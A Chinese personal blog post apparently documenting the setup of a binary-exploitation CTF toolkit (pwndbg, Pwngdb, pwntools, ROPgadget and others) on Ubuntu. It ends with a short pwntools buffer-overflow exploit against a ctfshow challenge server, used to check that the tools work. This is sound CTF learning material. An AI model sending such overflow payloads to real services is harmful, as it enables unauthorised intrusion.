0x01 前言
其实我觉得二进制这个东西还是比较神圣的,虽然我不会,但是我不能没有环境哇
0x02 action
16.04
安装VMtools,网上有教程,我的莫名其妙就好了
1
2
| sudo apt update
sudo apt install curl # 安装 curl 下载工具
|
1
2
| curl https://bootstrap.pypa.io/pip/2.7/get-pip.py -o get-pip.py
python get-pip.py
|
1
2
3
4
| sudo apt-get install python-setuptools python-dev build-essential
sudo apt-get install python-setuptools
pip install --upgrade --no-deps --force-reinstall pathlib
pip install pathlib2
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
| sudo apt-get install gdb
sudo apt-get install git
git clone https://github.com/longld/peda.git ~/peda
echo "source ~/peda/peda.py" >> ~/.gdbinit
git clone https://github.com/scwuaptx/Pwngdb.git
git clone https://github.com/pwndbg/pwndbg
wget https://bootstrap.pypa.io/pip/3.5/get-pip.py
python3 get-pip.py
(如果发现没有安装pip3, 尝试 sudo python3 get-pip.py)
cd ~/pwndbg
./setup.sh
cd ../
cp ~/Pwngdb/.gdbinit ~/
sudo apt install vim
vim ~/.gdbinit
|
文件内容如下
1
2
3
4
5
6
7
8
9
10
11
| #source ~/peda/peda.py
source ~/pwndbg/gdbinit.py
source ~/Pwngdb/pwngdb.py
source ~/Pwngdb/angelheap/gdbinit.py
define hook-run
python
import angelheap
angelheap.init_angelheap()
end
end
|
就这样吧
20.04.6
这个就是因为凌晨的时候,一位师傅(iyheart)知道我要安装pwn环境但是迟迟没动,但是同时新生不是来了嘛,很多新生都在学习这玩意,于是starrsky师傅写了一篇文章来弄,所以这里的基本就是和她写的差不多,就记录一下
这里重点说一下,选择y or n,全部都是y
镜像链接
1
| https://releases.ubuntu.com/20.04.6/ubuntu-20.04.6-desktop-amd64.iso
|
先更新,然后下载vim,先进root不然不好使
输入自己的密码
1
2
3
| sudo apt upgrade
sudo apt install vim
|
为了不一条条的来,师傅也是很贴心,直接写文件来运行文件即可 是在主目录下面进行的
1
2
3
4
5
6
7
8
9
| vim test.sh
按Esc 再 :wq
chmod 777 test.sh
看权限给上了没有
ls -l test.sh
./test.sh
|
文件内容
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
| #!/bin/bash
cd ~
sudo apt install tzdata
sudo apt install vim
sudo apt install libxml2-dev
sudo apt install libxslt-dev
sudo apt install libmysqlclient-dev
sudo apt install libsqlite3-dev
sudo apt install zlib1g-dev
sudo apt install python2-dev
sudo apt install python3-pip
sudo apt install libffi-dev
sudo apt install libssl-dev
sudo apt install wget
sudo apt install curl
sudo apt install gcc
sudo apt install clang
sudo apt install make
sudo apt install zip
sudo apt install build-essential
sudo apt install libncursesw5-dev libgdbm-dev libc6-dev
sudo apt install tk-dev
sudo apt install openssl
sudo apt install virtualenv
sudo apt install git
sudo apt install proxychains4
sudo apt install ruby-dev
wget https://mirrors.aliyun.com/pypi/packages/56/a0/4dfcc515b1b993286a64b9ab62562f09e6ed2d09288909aee1efdb9dde16/setuptools-36.6.1.zip
unzip setuptools-36.6.1.zip
cd setuptools-36.6.1
sudo python2 setup.py install
cd ../
sudo rm -rf setuptools-36.6.1 setuptools-36.6.1.zip
wget https://mirrors.aliyun.com/pypi/packages/03/c9/7b050ea4cc4144d0328f15e0b43c839e759c6c639370a3b932ecf4c6358f/setuptools-65.4.1.tar.gz
tar -zxvf setuptools-65.4.1.tar.gz
cd setuptools-65.4.1
sudo python3 setup.py install
cd ../
sudo rm -rf setuptools-65.4.1 setuptools-65.4.1.tar.gz
wget https://mirrors.aliyun.com/pypi/packages/53/7f/55721ad0501a9076dbc354cc8c63ffc2d6f1ef360f49ad0fbcce19d68538/pip-20.3.4.tar.gz
tar -zxvf pip-20.3.4.tar.gz
cd pip-20.3.4
sudo python2 setup.py install
sudo python3 setup.py install
cd ../
sudo rm -rf pip-20.3.4 pip-20.3.4.tar.gz
sudo pip2 config set global.index-url https://mirrors.aliyun.com/pypi/simple
sudo pip3 config set global.index-url https://mirrors.aliyun.com/pypi/simple
sudo python2 -m pip install --upgrade pip
sudo python3 -m pip install --upgrade pip
pip3 install --upgrade pip
sudo pip2 install pathlib2
|
然后pwntools这些杂七杂八的东西
1
2
| sudo python2 -m pip install --upgrade pwntools
sudo python3 -m pip install --upgrade pwntools
|
这中途肯定有黄色的警告,没关系,知识因为python2.7不维护了而已,继续干
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
| wget https://starrysky1004.github.io/pwnenv.zip
unzip pwnenv.zip
rm pwnenv.zip
#pwndbg
git clone https://github.91chi.fun/https://github.com/pwndbg/pwndbg.git
cd pwndbg
./setup.sh
cd ../
#Pwngdb
cd ~/
git clone https://github.com/scwuaptx/Pwngdb.git
cp ~/Pwngdb/.gdbinit ~/
vim ~/.gdbinit
#注释掉第一行 然后在第二行写入
source ~/pwndbg/gdbinit.py
然后保存
|
这里有clone的操作,所以可能会失败,但是多试几次就可以了,
1
2
3
4
5
6
7
8
9
10
11
| #source ~/peda/peda.py
source ~/pwndbg/gdbinit.py
source ~/Pwngdb/pwngdb.py
source ~/Pwngdb/angelheap/gdbinit.py
define hook-run
python
import angelheap
angelheap.init_angelheap()
end
end
|
检查一下
有回显就对了
1
| sudo apt install patchelf
|
1
2
3
4
| git clone https://github.com/matrix1001/glibc-all-in-one.git
cd glibc-all-in-one
python3 update_list
cat list
|
1
| sudo pip3 install capstone filebytes unicorn keystone-engine ropper
|
1
| sudo apt-get install qemu-system
|
1
| sudo -H python3 -m pip install ROPgadget
|
1
2
| sudo gem install one_gadget
sudo gem install seccomp-tools
|
one_gadget安装失败了,要ruby3.1,但是我不敢动
那安装一下这个
1
2
| sudo apt install gem
gem install elftools -v 1.2.0
|
还是不行,但是我不敢动啊,哈哈算了不管了这,找个demo试试能不能用
别忘记重启
demo
ctfshow pwn02
1
2
3
4
5
6
7
8
| from pwn import *
sh=remote("pwn.challenge.ctf.show",28236)
sys_addr = 0x8048518
sh.recv()
payload = b'a'*13 + p32(sys_addr)
sh.sendline(payload)
sh.interactive()
|
成功了
0x03 小结
这个东西我一直都想要的,只不过之前那台Ubuntu16,网络出了问题,giao了就一直没有搞,这几天也是有机会弄了,这些都是基础环境后面应该还有东西会更吧
